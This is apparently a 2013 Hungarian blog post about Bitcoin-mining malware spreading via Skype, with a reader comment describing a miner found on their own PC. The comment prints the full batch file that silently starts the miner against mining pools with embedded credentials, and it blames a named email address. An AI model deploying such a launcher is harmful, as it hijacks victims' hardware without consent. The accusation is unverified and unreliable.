2013. április 12., péntek

Bitcoin vírus

A Kaspersky Lab szakértői két rosszindulatú vírust azonosítottak, amelyek a népszerű Skype programon keresztül célozzák a felhasználókat. Arra az eredményre jutottak, hogy a vírus képes Bitcoin valutát generálni, ha a program már megtalálható az áldozat számítógépén. A Bitcoin valuta rendszere egy program segítségével lehetővé teszi a felhasználók számára, hogy Bitcoinokat generáljanak, annak fejében, hogy bérbe adják a számítástechnikai eszközük erőforrását a rendszer fenntartása feltételeként. A virtuális pénz később más valutára váltható vagy online áruházakban lehet vele fizetni. Annak ellenére, hogy mindössze egy napja indult el a legújabb rosszindulatú vírus támadása nagyon gyorsan terjed. Több




Nálam nincs a Skype telepítve, de így is találtam bitcoin bányászt.
A vírustotál szerint a C:win32.exe
C:kernels\drivers.vbs (automatikusan induló programok közt is ott van)
A kernels mappa még tartalmaz egy processor.bat állományt minek tartalma:

@echo off
START /D C: /B win32.exe -u http://matts0053@gmail.com_miner:bmr001@pit.deepbit.net:8332/ -b http://koelen3mine.miner:bmr001@api2.bitcoin.cz:8332/ -k poclbm DEVICE=0 AGGRESSION=0

A matts0053@gmail.com email cím szerint ŐŐŐŐŐŐŐŐŐŐ a ludas.